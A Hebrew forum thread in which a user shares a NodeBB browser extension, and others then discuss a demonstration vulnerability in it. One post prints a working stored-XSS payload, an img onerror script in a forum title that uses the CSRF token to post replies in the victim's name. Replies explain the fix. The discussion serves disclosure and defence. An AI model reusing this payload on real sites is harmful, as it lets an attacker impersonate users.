שיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!
-
@יאיר-דניאל
למה אין לי את כל הכפתורים שיש אצלך?
זה שלי
זה שלך 
@קראנץ-ונילה התקנת את התוסף שלו???
זה מופיע בגלל התוסף שלו -
@קראנץ-ונילה התקנת את התוסף שלו???
זה מופיע בגלל התוסף שלו@יאיר-דניאל
התקנתי, אבל יש לך כאלו שלא נמצאים בתוסף
(למשל הכפתור של היד, הספר, המצפן, והידיים שלוחצות אחת לשנייה) מה זה? -
בס"ד לאחר זמן רב שעלה במחשבתי לעשות זאת - יצרתי כלי לשיפור הנוחות והממשק בפורומי נודביבי, הכלי כולל פיצ'רים שימושיים שאת חלקם לקחתי מתוספים וסקריפטים שהועלו כאן בפורום ואת חלקם יצרתי בעצמי. הכלי זמין גם כתוסף לדפדפן וגם כסקריפט לטמפרמונקי. בחרו את הגרסה המועדפת עליכם.
הכלי כולל את הפיצ'רים הבאים:
-
מרכז הפורומים – צפייה בכל הנושאים שלא נקראו מכל הפורומים שאתם חברים בהם במקום אחד. כולל זיהוי אוטו' של פורומים חדשים. (קרדיט: @יאנג-בוי)
-
מייצא שרשורים – כפתור ייעודי להורדת או העתקת שרשור שלם כקובץ JSON מסודר. (קרדיט: @nh.local)
-
העתקת פוסט כ-Markdown – בכל פוסט יתווסף כפתור להעתקה מהירה של התוכן בפורמט מרקדאון נקי.
-
קישורי סרגל צד חכמים – הוספה אוטומטית של קישורים ל-הכי הרבה הצבעות, פופולארי, קבוצות ותגיות לסרגל הצד (אם הם חסרים בפורום).
-
נושאים אחרונים – כפתור ייעודי לצפייה בנושאים האחרונים לפי זמן יצירתם. (קרדיט: @עדלאידע)
מנגנון מניעת כפילויות: הכלי חכם מספיק כדי לזהות אם כפתור מסוים כבר קיים בפורום, והוא לא יוסיף אותו פעם נוספת.
תמונות בספוילר
להתקנה
הכלי זמין בשתי גרסאות – בחרו את הנוחה לכם:
1. גרסת התוסף
בגרסה זו תקבלו תפריט הגדרות נוח שמאפשר להפעיל/לכבות כל פיצ'ר בנפרד.
להורדה מהחנות2. גרסת הסקריפט (Tampermonkey)
למי שמעדיף לעבוד עם מנהל סקריפטים:
להתקנה כסקריפט לחצו כאן@לאצי כתב בשיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!:
מרכז הפורומים – צפייה בכל הנושאים שלא נקראו מכל הפורומים שאתם חברים בהם במקום אחד. כולל זיהוי אוטו' של פורומים חדשים. (קרדיט: @יאנג-בוי)
@לאצי כתב בשיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!:
- גרסת התוסף
בגרסה זו תקבלו תפריט הגדרות נוח שמאפשר להפעיל/לכבות כל פיצ'ר בנפרד.
להורדה מהחנות
@יאנג-בוי כתב בשיתוף | קבלת 'נושאים שלא נקראו' מכלל הפורומים:
הסקריפט ניתן לשימוש חופשי, ניתן להשתמש בקוד שלו לכל שימוש, ואף להפצה מחדש (גם בלי קרדיט; אבל תתנו, מה אכפת לכם... אז מה אם לא כתבתי כלום, עדיין השקעתי זמן על זה...) בתנאי שהוא נשאר כסקריפט לטמפרמונקי, ולא נארז לתוסף כרום בשום אופן!
גם אם אתם מהמוזרים שאוהבים שהכרום שלהם מלא בתוספים, אני לא רוצה יד בזה. והסקריפט הזה הוא קריאת השכמה לכל מפתחי התוספים כאן בפורום. -
-
@מים-אחרונים תנסה את התוסף של @cfopuser תבין מה נסגר... גם אתה איך שהוא תכתוב את אותם מילים... אבל בדיוק!
-
@לאצי כתב בשיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!:
@CSS-0 מכיוון שהפוסט המקורי של @cfopuser נמחק אשמח אם מישהו יסביר לי מה הלך פה...
@cfopuser יצר פורום נוזקה, שכאשר מוסיפים אותו למרכז הפורומים בתוסף שלך, הוא שולח בשם המשתמש בקשת API לכתיבת פוסט חדש.
הוא בא להראות לך שצריך להוסיף אבטחה בתוסף שפורומים שנוספים לא יוכלו להזריק קוד ע"י התוסף.
זה https://cfopuser.----github.io/forum/ הקישור לפורום, וההזרקה היא בכותרת הפורום
-
ויש לציין שלדבריו זוהי רק פירצה אחת מיני רבות בתוסף.
להרגשתי צפוי לנו פרק ב' מרתק@קרט כתב בשיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!:
להבהיר את בנקודה
רק @cfopuser יפרוץ לניקים ויכתוב בשמם הודעות
אבל לא יטרח לתקן שגיאת כתיב בטקסט שנשלח בשמם...
או שזו סוג של חתימה
עריכה - @יאנג-בוי ברול הבא למועדון
-
@לאצי כתב בשיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!:
@CSS-0 מכיוון שהפוסט המקורי של @cfopuser נמחק אשמח אם מישהו יסביר לי מה הלך פה...
@cfopuser יצר פורום נוזקה, שכאשר מוסיפים אותו למרכז הפורומים בתוסף שלך, הוא שולח בשם המשתמש בקשת API לכתיבת פוסט חדש.
הוא בא להראות לך שצריך להוסיף אבטחה בתוסף שפורומים שנוספים לא יוכלו להזריק קוד ע"י התוסף.
זה https://cfopuser.----github.io/forum/ הקישור לפורום, וההזרקה היא בכותרת הפורום
@ע-ה-דכו-ע אשמח אם תסיר את הקישור לפורום בכדי למנוע פוסטים נוספים כאלה.
@cfopuser אשמח אם תסיר את הנוזקה. (אם כי אשמח לקבל את קוד המקור). -
@ע-ה-דכו-ע אשמח אם תסיר את הקישור לפורום בכדי למנוע פוסטים נוספים כאלה.
@cfopuser אשמח אם תסיר את הנוזקה. (אם כי אשמח לקבל את קוד המקור). -
@ע-ה-דכו-ע אשמח אם תסיר את הקישור לפורום בכדי למנוע פוסטים נוספים כאלה.
@cfopuser אשמח אם תסיר את הנוזקה. (אם כי אשמח לקבל את קוד המקור).@לאצי כתב בשיתוף | נודביבי פלוס - כלים שימושיים לפורומי נודביבי!:
@cfopuser אשמח אם תסיר את הנוזקה. (אם כי אשמח לקבל את קוד המקור).
הנוזקה נמצאת בקישור שהבאתי, זה לא כזו נוזקה רצינית, ס"ה הוא הגדיר את המאפיין title לקוד הבא:
<title><img src=x onerror="const token = config.csrf_token; fetch('/api/v3/topics/94984', { method: 'POST', headers: { 'x-csrf-token': token, 'Content-Type': 'application/json' }, body: JSON.stringify({ content: 'שלום כאן @cfopuser רציתי לומר שיש כמה באגים עם התוסף שצריכים טיפול אז נא להזהר @לאצי רק באתי להבהיר את בנקודה הכול בהומור' }) }); "></title> -
@ע-ה-דכו-ע אשמח אם תסיר את הקישור לפורום בכדי למנוע פוסטים נוספים כאלה.
@cfopuser אשמח אם תסיר את הנוזקה. (אם כי אשמח לקבל את קוד המקור). -
@לאצי חשוב לציין שלפי דברי @cfopuser יש שם פרצות אבטחה הרבה יותר חמורות מזה.
ג"א מצטרף לדברי @בנימין-מחשבים אני ממש מצפה לפרק ב'...
@המלאך הנוזקה עדיין פעילה?
עריכה, לכאורה לא... כי התקנתי... והוספתי את הפורום ולא השתנה כלום -
פוסט זה נמחק!
-
@המלאך הנוזקה עדיין פעילה?
עריכה, לכאורה לא... כי התקנתי... והוספתי את הפורום ולא השתנה כלום -
@מים-אחרונים לא אני עשיתי את הנוזקה אלא @cfopuser .
אם היא לא פעילה זה קשור אליו.
עריכה: היא כן פעילה..
@לאצי תוציא עדכון אבטחה שעושה רק קידוד פלט.
לא מעביר את כל התוכן ישירות.@המלאך מה צריך לעשות בשביל לראות אותה?
כשאני כותב פוסט, היא אמורה לצוץ לא?
-
פוסט זה נמחק!
-
אוקי, זה לא קורה מיד בעצם, זה קורה אחרי כמה דקות..?
מעניין אותי ללמוד מה קורה כאן!
@cfopuser תוכל להסביר?@מים-אחרונים אתה יכול ללכת להגדרות מרכז הפורומים.
@לאצי בול אופן, לא פרצה מורכבת יש עוד כמה פרצות אבל שיותר קשה לזייף דרך נושא מוגדר,
והחזרים זדוניים של הapi,
בכול אופן בחרתי בזה כי זה הכי קל להדגים בפשטות.כול תוסף של ai, יכול להכיל פרצות לכן המינימום הנדרש זה לא להשתמש בדברים כמו inner.html כדי להציג טקסט ועוד הדבר רק יגרום לצרות.
Cאופן כללי יש להיזהר בפיתוח על ידי ai.זה הפוסט המקורי למי ששאל בכול אופן אני ימחק את האתר עכשיו ככה שאין כול כך עניין בדבר.
כנ"ל לגבי הפוסטים בנושא נראה לי העניין מוצה.לכול מי שלא עובד לו מרכז הפורומים,
הפתרון זה ללכת לפורום שאותו אתם רוצים להוסיף לדוג' הפורום הזה (זה סתם פורום לבדיקה),
להוסיף אותו למאגר (בלחיצה על כן),
לאחר מכן ללכת למרכז הפורומים וללכת שמה בהגדרות וללחוץ על הפורום שהוספתם.||
טוב זה המסר על תוספי ai אני מניח תיזהרו חברים
-
@מים-אחרונים אתה יכול ללכת להגדרות מרכז הפורומים.
@לאצי בול אופן, לא פרצה מורכבת יש עוד כמה פרצות אבל שיותר קשה לזייף דרך נושא מוגדר,
והחזרים זדוניים של הapi,
בכול אופן בחרתי בזה כי זה הכי קל להדגים בפשטות.כול תוסף של ai, יכול להכיל פרצות לכן המינימום הנדרש זה לא להשתמש בדברים כמו inner.html כדי להציג טקסט ועוד הדבר רק יגרום לצרות.
Cאופן כללי יש להיזהר בפיתוח על ידי ai.זה הפוסט המקורי למי ששאל בכול אופן אני ימחק את האתר עכשיו ככה שאין כול כך עניין בדבר.
כנ"ל לגבי הפוסטים בנושא נראה לי העניין מוצה.לכול מי שלא עובד לו מרכז הפורומים,
הפתרון זה ללכת לפורום שאותו אתם רוצים להוסיף לדוג' הפורום הזה (זה סתם פורום לבדיקה),
להוסיף אותו למאגר (בלחיצה על כן),
לאחר מכן ללכת למרכז הפורומים וללכת שמה בהגדרות וללחוץ על הפורום שהוספתם.||
טוב זה המסר על תוספי ai אני מניח תיזהרו חברים
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}